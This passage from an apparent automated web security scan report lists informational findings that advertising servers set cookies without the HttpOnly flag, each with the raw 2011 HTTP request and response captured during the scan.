LnugdkWwYNOashsf6bBdytaAhOmPeOITWXSATA4ZE5SyPxGC0Znb3KDFATW1t50eAoudsHBsRbGRnxbn5H9cjPONtxL7egOM2+ltX2Nj9k3QVOzWzXEbkqT5akyVl21my7/DhratEWYI71JWlJ+9P5DWoLAVAyHTfXhezKMST83PEAtbhYhRavvp7A==; rsi_segs_1000000=pUPNcDPB7QMUFVJmHElW1WAhFpB0I5EmV+QHrdRrcAMkOX+o7LQjAQv0aGumjYcA+pD55MfuOfQbGooH3qorp++zHuX/61m4ao1z4yL4Lb3cyf2EkQb/3ZOSwdnh6MSu2Um4QVZJKClGNz2Fl9QeLKxco3pM/j3xxqXi/RBfDYQLHw069nJi4GhHujSDyULrAXw98qMzqzoEqWE=; rtc_6axN=MLsvrdMvcT5jJQFErn5VSDYGHlHr5G4IUDwGBCOQN50vl8AxTgkQ69k2sWbYhD5swupGFuttZZ30pjREZ/ZkKkhmVOC4XP9dHEpHAm3ADaku92HBduCPjDheEZyi3USKjMyJU8PKvSGf6dbgKbkkF1T9nPoTyICKBODL5dWNTWGJSo//SZoNqh0jXWrCVj5fE0hG1/Ew1855Q3kGOJISwLZwyFyrdDpPp9pEr5K7YRGtS1DhqDKb+B3xI4h5pUmK196H1VYARyez77DbY8fCN3YqmgkgAm74R4TtPLq8byYJ7dh3Jpzg7zgqcfYD+8HJFFf4m0VurVwRBH7s; rsiPus_Tw8y="MLsXsF8ubi5n4BCjMHbCV2gEC6h3AhMm/qbJZjq8VFKBZFiot29LyxVRkwlFYB/Zd94k4drR1Zh1QFPNtapqMl8oAcbH8bPAaI3fID4jwY3x0LpAV0MvRMJQ0QGOBSXNT5lallTZdmpHKrec2FqdnV2GTpucEYp7kOvcu8lfQ49j8sdcltawc4Cn1Qg7/azvTUE3EBrW9n2Wr2+2vH+8ecK+yc2qKUDrtePZntX9Y1ci1nBSCTfZoTnvJn9U9TV+ekHBiQ1F/HNha7/5IblHPjVwBRAoUJvi33WtQ8i1nVyIE7MhCx7at5Uyo/qOIDwvw2Gi+0B5pTWhd4kzKm245oNOmtBdgGIL93lqSClgX1l6+Bm3JgnyHoJLpHvm3G4s3LEwNZE5D/R1bCjuA8RBSWOKtjVEPgdeYW38wM897HChogDtvYqD36ymo/MMpslX12uy7+Ww"; rsi_us_1000000="pUMdJE+jMAYYlW2Evr0qOsoHgT7/5aCXkN7z8gcXCgZ1gJyn3KcbcbO6ilR9rYspgf69oQGhvkYT2QspKokupFqg5tgqCXTRw7cPyUnWXwxVgCYMqkBdbj61dIA+oaHJTSDW57NprxIQ2dtdP7FVD8xZ5hLRMwezltge4Ao9QX1WZypp46fuXPp7j9WR9yOzLIEyFyYvYrmuyaVpmd2KE5SMk4ckzjeJic4yseRy7VKe143nLnpeLnuAIDbICb1f1Z0SijORp19bSsPZa7yOVmK0GQ4oH3b2M5RjVR9OEduFKxCoKYg3hqhE3VLtC9trjwYeRYb81JEzsvlvYz6g4kzXlyL+0pUr8xWkzyCpH26/5EsBvOn9AF0bX3XEjsmPY1oz+KkNKfFavCnUCFTLc7FAMbtREnae0B/fkKz4pxUsSn0ZQuf2SnQ4ZtnZaQ4ObEARnJ//V/HTxZOtGDir2KurGtkYJK/pduPAPTSNO8cZ6gkdchiXp9rD0Eus4UT3mmQwg5yPlyYlb4XaxEtLJBVv5k7ytiOQ8ysrGO0vuFI+jnzbgthAl2yT3P5QZWJGD+dmTIWaD1EHDRGZDTxoV+v/ohtmywAlFfv7VibvM5JJMPqhZHDx/KBCZMmKRMDLI9T6t+wFMFnIcX1X8S7PgRjYebA7Exs2KeCxbB0r5srsO4u2eutTejumnDJGW5vkPcn8MJv1I3Qb5sdRQdjx5uHOkAZ860iCPRsssqFS8k3JwhxI3LyibcF6BUDdB32QtDdyJVJtg3n5AUFa+0+JQaJv1prJbhm2EwsfCLUicBNVXRcQ16WXQ+soDryq/cbeAqLuPRFVpFotpfwWpeAMKaHOBCv6zZ1FxuDJApFaxi3CE14b/o61dKDxm994dsj0h/jyworSTDFGc79ndPaSC5+V15MWiZlkW3SrmslXU6KdqrK52S5wByn4XuG5lQc91Cer0Ga+/EjKvvO7rb4dJJcdO3QYiHXtPmj1B45axqoUuaX7HdfpX7uDfpV8j2rK7cDyb+6lFAMTFSnzKO8YdSCxEieM8VMxvBgF3Ae3JpUpoOs="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Tw8y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Tw8y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_EFRe="MLsXsF8ubi5n4BCj6Iwxj+ChgP9MmEaXnPMMWCjo3/gXOBYBOsgcKGmq7J3s8bm4bP9V6n0/+EkoPKhDxyym+KpE+UnSzY618JInjZ4Vc3SM3rDP9UJfDSkXg1eZEJ9HLo/9NVCpb9+N+saY7xF1GBUZXMcK1aeMOXP/obAgtoLIVPpP5p2fjSYhtBOPhumCT47DvXqC0WxEZc2TDtWV8rIq0VYJyrB526WlEN32NvjJe2uvbUMygIKnXNAW/AFS2Cdh6UElOOTpD4aZdk9fgCnljiBDJVFj4NlURCJQYL0PUxpDs8c3jgnWAbcm3alSssJ7Cb39tuHUQmW82lxx1e8sus3nHtJM+GM96RXR/2JV0pbo+ZUJ0RuWnlag2CVFsnnhRCI/tQuePjthQWfj08W8edxeZLER9LxUCEWSzBdbMi0ptxQFrq2Qf9ssen3OdR7OfUXgrAM="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1052401&t=2
Content-Length: 0
Date: Mon, 16 May 2011 01:59:00 GMT


13.63. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=2034736289642.7512?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv39S8JaSpnph4dB7K/U2jMrlZxPiFsbBfSBcrlROJywhuHqR1r/UA1T0iRssIdAE9WG5SkuBEsQUD3IuuN09ImomKQMeFq1jtxllLl2hNvJ93zI8nQT72tjMgtUdO//9wYgRqB8ZXuPro+o7BxsBR5pxD7EXVtXGydBkVQEudXG2D2wIkNBeqHmIWJj+bGrdjGRyWixast+xLN0K4Iw+ew6ThmTEKns4HxFbcBnFLmChGZ934MWdGZXXYRWuhxS3cwBXNGIONtB2mXemfgyEqzd2IBmI9G7wogGLDx8Lw0DAp53p7JuTlqcYDDCICXYM9H2ZnYlIi4JrCJzCy8WcgNq18GmmzuaTOz/CYt2C7l9cgcwecxI15dlo8KJWy8mdmvMATQlBQZvvshGx7/ZWO+n5+L+o3XoVAx3gT2aCZHqJjly/K2Xoj1Qw67qH0PuJYpMK5P/KiQ3zOVyfP/ypI3utDRIhc08fTvQR/OwZZuegUWhFE/sq9FQhAzxOxIUTEvSResbfdfBhvTYofAJyTSyywbmhBb1MDtD0AFkYRyczjrYj2sKaFHZRb4fmzvPKfH6Zk5gmTLJV0gMS1UqtVy/S2L8TpN/clrGMHfxjNSPD5FT/EJtkm0EFhEQ27Z/cReQRxmltlL0MzcDhcs4e/wDwceblUp0um7chLLj/9/l1yBXBuwEgHk1flpVPkRmS/XI+a+2dCRvFnQSugMULpDNrA24o1pFVOIWNzLGZT2Krf+nzgF5TV38bNdoImSe5zwcruCXUG2Ktx5bQZtk7hjyijC/wmaioSX0PWNvks1FPlRUSXt/go8LnugdkWwYNOashsf6bBdytaAhOmPeOITWXSATA4ZE5SyPxGC0Znb3KDFATW1t50eAoudsHBsRbGRnxbn5H9cjPONtxL7egOM2+ltX2Nj9k3QVOzWzXEbkqT5akyVl21my7/DhratEWYI71JWlJ+9P5DWoLAVAyHTfXhezKMST83PEAtbhYhRavvp7A==; rsiPus_-pah="MLsXsF8ubi5n4BCj6Iwxj+ChgP9MmEaXnPMMWCjo3/gXOBYBOsgcKGmq7J3s8bEELtEtuQAUMg2twd9L78Ckve4PRhn+TnbZZgzQjU6BafW/eRnGpuy0oiVFGmY3Anfh17v9nbyJlC6WkITH1s7atNzA94Byz2ahQWWSkgzSBeq/m5yGRHDBWVE3WQKWx1rq0Os5JD95fxkgtM/XMh8ZPItRGPdDs6DkKTj57w7NLvTrFYiNQkaAQXrvVknibEJ2Q3EEI6f88RHWUnsWlXdsumEcJ4AZQLWPtn8GUbAKtpnD2xZHycOIz+UUUTimvw1mPizedaDoQ3uueOR55nVFaPfwnliNg2DvaGTMKiNaZXNWSnvgXbxjGssTFwevLvWOYWkMVKVnyPJt2uFto8uxRa0p6J53cfm74Hg2akeLDOYR8NEH+Q6UGJLQxN+ehQIy1YbeY76PrG8="; rsi_us_1000000="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"; rsi_segs_1000000=pUPNfkOBbgIUFmLCHes0KW6m3ZgQXnnQ2eTN9Oww/xC5n7e8t97wZrFpPHW1rmtgC9BicX3TKz2eCELNYrMRQ5Lqu2zxeyWWfvlSUcVQiomYts8ECBn+Htu45MvaZOVPjeiVX8Zn2dbYnd4CY/vI2hWo9+I5cVgso6DGe8kTro5udIZWJUPSA1+To+3klpCjRbw2Bad0n9tXCulP4zeaUmaiTlY9FzqRkpBXPIFsEjprZNo=; rtc_dUn8=MLsvsNFKMT5nJ5GuU8+Vm/S3bm5E5k5tMt3NnMGp0iPrRxZIAPXk1sWJJd0/criBZWlpdqwlBoSERTTrYCc/gUIlS1FVffKLHMTvhZ2/kRd2fDWGXo0973OxjVJvM4sWN23lbJTGpwkPvUZano6YF0AUV+JeNaoAt8+pSbKbdnsUNCEdADOFfSeqyYTDSDEIe2vG2nUWVvCrZ+mEz9AYFmDW2hNSjGBpITTC96K7z8YQwS3lvAdlwRZUXU+bm0B6nc2R3bprYgz8eD2Ov4Fe4x5XnK8Mne17nReJOAJZHIgz5IbuNCwt4XEkjz14AaSmzHNOpukOLKJpmILuaSsa9st9voigEMZmhjkK3mkyeJhApPsJEbab/3lzTO39mzt5Z54rippve02eRS7gFHqfCoB3HzprQxzA4Cf+P+TfZnKZ89g=; NETSEGS_D05509=82f4957c1a652091&D05509&0&4df56df0&0&&4dcf5b30&1f1a384c105a2f365a2b2d6af5f27c36

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-pah=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-pah=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__g3U="MLsXsF8ubi5n4BCzUIwkp6Hql1A6rO31WVmGRQQBkAeIWvwl0z+NLXGYQV3jYHIoKow4I8MNFXoBKaA0Dmym+Ku0dkfouHaJ+u3AheYIQwDLhXakPiNxvHdXkqX5nUNUQkvVx6Eaj5O9v5Xcjbp9UvegWmGbavTTK0jhnIGcVnPgFyp+WCoXFJ/YCb6xoCFz5/OtP/XFXJ6ARSf8Il8eHtjSQ07DH7e40npqJyO7tdQkVxepqkO4h33GXxQRehGwbDMII/X964qnDBZK+hvoJgSDVTQJgbfrr9VStGZJoYAHl4yP0wCaqMqXev3nQn//YT1f5MDp3TFC5DYQRL8HsygEMgbtautJJDJrFXZfXon5bJIGfS4r2gaBvuG1hs92eLagBvBS0sDmmYhgZ3tvqzlxJ3x0XqGk1zoQfFcwPzRIYEbWjaJNG6mOleL0WvyW7crhgFR1u/9g"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 10:34:15 GMT


13.64. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=4650606513023.377?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=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; rsi_segs_1000000=pUPNfkOBbgIUFmLCHes0KW6m3ZgQXnnQ2eTN9Oww/xC5n7e8t97wZrFpPHW1rmtgC9BicX3TKz2eCELNYrMRQ5Lqu2zxeyWWfvlSUcVQiomYts8ECBn+Htu45MvaZOVPjeiVX8Zn2dbYnd4CY/vI2hWo9+I5cVgso6DGe8kTro5udIZWJUPSA1+To+3klpCjRbw2Bad0n9tXCulP4zeaUmaiTlY9FzqRkpBXPIFsEjprZNo=; rtc_dUn8=MLsvsNFKMT5nJ5GuU8+Vm/S3bm5E5k5tMt3NnMGp0iPrRxZIAPXk1sWJJd0/criBZWlpdqwlBoSERTTrYCc/gUIlS1FVffKLHMTvhZ2/kRd2fDWGXo0973OxjVJvM4sWN23lbJTGpwkPvUZano6YF0AUV+JeNaoAt8+pSbKbdnsUNCEdADOFfSeqyYTDSDEIe2vG2nUWVvCrZ+mEz9AYFmDW2hNSjGBpITTC96K7z8YQwS3lvAdlwRZUXU+bm0B6nc2R3bprYgz8eD2Ov4Fe4x5XnK8Mne17nReJOAJZHIgz5IbuNCwt4XEkjz14AaSmzHNOpukOLKJpmILuaSsa9st9voigEMZmhjkK3mkyeJhApPsJEbab/3lzTO39mzt5Z54rippve02eRS7gFHqfCoB3HzprQxzA4Cf+P+TfZnKZ89g=; NETSEGS_D05509=82f4957c1a652091&D05509&0&4df56df0&0&&4dcf5b30&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_gTSf="MLsXsF8ubi5n4JDyDnheiwDql1A60Lsw0wyTHpTkGlKdGbCiOsgce2mqLNp9XQ+oVRFqht3dMO1mX1+8dfVskDjKy2cX/+Z4lnteDZm422W0rSpVxafl8+M3Fk56Oh4ptMD+h/TL16cClJvwhzx3ksiI372OclKk2rrJElMP9zSRn673IT6QntSmNJGRjB9z5zP1BvTF3BWBjl2ihgs4mkfaQEqjt9p+cBVDcmp3g8C/5o7hwOfsvpsaEL2NaEL8Yclw+0Vwxy+NhY8AmK1hLFhm3AjJYvZm7QcK/q0p6GGTtsbZ+yCazwOJc1Va5W5RVdAPXjZwCcYrug1AWdTvw+CX8pl1tT5CvgRtv4wdCIRceojk3s7+FbmOzt1dOtrGM8Ug5CT17KIktYNbeStxehxlUFVwnCxOkk7lLa1gAjSeJOnilkeIzHLo0yuoDlhn88sfkWZXU/94"; rsi_us_1000000="pUMdJE+jMAYYlW2ENjvhvlyjvObDParz4dd72Y2njSIQ3Ejbp4sN6MhluM8oZa8Httq55yHRxC8ZzYVchSGk4TkgcB56UrzjgJIXREFzLX43WBsxlgpdbj61dOiIg76BvfGJFZsjP1DddUf4Z8ICk59e3Twi7ijmYiu3pu3z9gYxZZMb9f1t4xig0cgrpStqeslISiOQIcB8zs8ypIerbzS2TPeSmKj0IlZ4k6qHdysgn6IsIrCK2Q98rebBMt9EQT7AQofgv7NV7iBmcy63NAkt+/NiUqrZvx04W5DA4ia+7TpPasFKKHfSgdztF7O67saYxqjzbUvN1k101FJXYBhcJIthuYGpmv+PlT6ji0bSPzuEhgTIXUBzWjfYfabIkr73uK0CExEj37ApcDXLd7FAMbtRknaeEB7fkKz4rxUsKv2YRcZodYwnZiTvV6eSWxFTylleEaWo/4nXX5xx1S7tTqLSjGgSabCGAJV9rzysY/Ywii41kWDVJwd4Mcmryv0Ys8mQgF099zvt4sJO4+L0DBmttBohCo/NHH4w2NW42OiNAQ4v4GPM9fmSZQAlcnPV300cuFSHvdVJfFM+aW+M8EZOSYCY4eZcFJa2Ez4slFHRhFwt7knbL+pOhl9sHKdX2WJ5S2MUZXMcRPcLyi8gikA/qwYWacyXvX/j7bL1Z8oNz+hpHu91g4NbGbvsTVn7U8Th+LYMrDLU39ALFt6VYJ1L0qkawvLEB9SU00z0AeCjdrkjdjJio2hvUMBiZekzCXSUKE1qap6PxOuHz+1uPRIe7tHF0pkC8z+3Bxl+3YNWD4Z+z5wOoyfTDeoN6VJFV4ug2qwHGSXyhMY9+w5TEGP8secVB08eHPjvIErmYAytwsIud2fgi9Z/AwXu6Yy7YJ8zhFzWS3rMcBLtpxssv/+CSnTmfVYbZS2C9w8ZQQJx5OTTknGzeKtTBlPIpNfRRbwI5PsznWuAg8gClBY5PUzOIV+9KlSFGBF8/DghOQSRr4a/7fOReWHlosdROghDC46Yc8gDO6qZfdb4Lb+40i3dd/BVkYW5lC3XK8W94VNTG14="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gTSf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gTSf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_fS3U="MLsfsN8vLi5noABTslDGHgHql1PWxLtwUwyTr7SqEAeIG7Al09+u78XGTslEJh9hd6s4uyf0KT+RdVkyIHCdaeQj3mcEU7l6Sj3Qj5G4WmW0rSpVxafl8+M3Fk56Oh4ptMDux7SrL5cCm77WnJyEjeFA0mmzapRCOBUulwgIjQm+g66XIT5QuklEZQ0ZUK40lpWz0shPr8fLCb6nws9ZybhLffqh5oA/PO147pi1rhzplrmCnxESmw4o+EBf8zgWak40Ty27uaje21eUT8BSI6pxESrpcBetjrx+EQP5BfDN25iRTl0UGV6Rd0PW+PODtnDjF0aDwrfsnCXsDZA1lz5pIm7H8vTOz6Tp6rXuoEwC4vnK2+3GKFkTy9efnh4s3LEwNZE5D/R1bCjuA8RBSWOKNjVEPgdeYW38wM897HChogDtvYqDXI+EuvaQzYnW2WrcIuVG"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 10:40:49 GMT


13.65. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=1351916219573.468?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=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; rsi_segs_1000000=pUPNfkOBbgIUFmLCHes0KW6m3ZgQXnnQ2eTN9Oww/xC5n7e8t97wZrFpPHW1rmtgC9BicX3TKz2eCELNYrMRQ5Lqu2zxeyWWfvlSUcVQiomYts8ECBn+Htu45MvaZOVPjeiVX8Zn2dbYnd4CY/vI2hWo9+I5cVgso6DGe8kTro5udIZWJUPSA1+To+3klpCjRbw2Bad0n9tXCulP4zeaUmaiTlY9FzqRkpBXPIFsEjprZNo=; rtc_dUn8=MLsvsNFKMT5nJ5GuU8+Vm/S3bm5E5k5tMt3NnMGp0iPrRxZIAPXk1sWJJd0/criBZWlpdqwlBoSERTTrYCc/gUIlS1FVffKLHMTvhZ2/kRd2fDWGXo0973OxjVJvM4sWN23lbJTGpwkPvUZano6YF0AUV+JeNaoAt8+pSbKbdnsUNCEdADOFfSeqyYTDSDEIe2vG2nUWVvCrZ+mEz9AYFmDW2hNSjGBpITTC96K7z8YQwS3lvAdlwRZUXU+bm0B6nc2R3bprYgz8eD2Ov4Fe4x5XnK8Mne17nReJOAJZHIgz5IbuNCwt4XEkjz14AaSmzHNOpukOLKJpmILuaSsa9st9voigEMZmhjkK3mkyeJhApPsJEbab/3lzTO39mzt5Z54rippve02eRS7gFHqfCoB3HzprQxzA4Cf+P+TfZnKZ89g=; NETSEGS_D05509=82f4957c1a652091&D05509&0&4df56df0&0&&4dcf5b30&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_gdpk="MLsfsN8vLi5noABTslDGHgHql1PWxLtwUwyTr7SqEAeIG7Al09+u78XGTslEJh9hd6s4OwXRvHjhIt8FcDXoBi5XqlnhuXhK+k7hhaJI9zU0CAuIx0hsbmph+ZwgGeQeavIa1wELH/jDnMrkr5ZpsnIwCKEGtcM070rhnKCJbnPgv/JP980S3TweqoaKG8kJudfxHiM2PjYCc+D3Kv4ZPeg4bJTfdrbQ7bptZJ4LtegkTcumqkO4h33GXxQRehGwbDMII/X9E+oPGwCg/xwUJgSDVTQJgbfrr9VStGZJoYAHD5K//QGfoiqTdSk5kXeo+0t3uTulN8p2Syu4yooLi8xN0kkhhQFMaSloQAt+9Q+rZ1/e100i8gaSvv7Fip5trVtjKqBYmXFoYwBh69bL8neIF3GxHL2kSRBU3s9WTic7L/IPVuew0+vAT3v8lsmTxk7equVE"; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gdpk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gdpk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_d8_3="MLsXsF8ubi5n4JAyM3neYUxL3byjGsaEu/PC8mfHrq2VN39C16clOd3lkQlF1r/4K9EuhyUUMr4GPKtDxyw2G0juyqPI8XbZZgxfiq6AafW/eRnGpuy0oiVFGmY3Anfh17v9nYyJlC5UWYdeqDDdjrbgLXmJ/pPo0wj0EEJCaVkNVr40iay7FTbmR5NbJCI+blpGLNeUxzogtMtHHUMNGwKx3F8aXmoPHRRqxtB/goK/IQ/uQoMDvsrutEqhZDMsyUVheav05qrblRXDPWy/rNJxLaVLM3GosHx+8zzqqJ3btw9S/QKOvEkPJO9OSD4Jsz7ZUKMr80s+7gxEkCY/pm6gU1moOoAGWrgwiuiNH0S9mp+WVqAw6ktrAucvsE6ybbgCJS2yX80idCxNbeHUzPswwQoj8F3xoVQQTNeKEEk1PD7lXR/946Xqqd2cisQ934ITg8brLQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 10:41:55 GMT


13.66. http://ads.undertone.com/f

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /f

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /f?pid=2978&cb=[timestamp] HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/17038/universal.html?page_name=ps_homepage&PS_Retargeting=1&mpuid=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UTID=4fa40dc9ea734290be23eabae06b7886; UTPROFILES=15110%232978%3A1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Content-Length: 43
Content-Type: image/gif
Date: Mon, 16 May 2011 02:00:16 GMT
Connection: close
Set-Cookie: UTID=4fa40dc9ea734290be23eabae06b7886; expires=Tue, 15-May-2012 02:00:16 GMT; path=/
Set-Cookie: UTPROFILES=15110%232978%3A1%2C2; expires=Sun, 14-Aug-2011 02:00:16 GMT; path=/

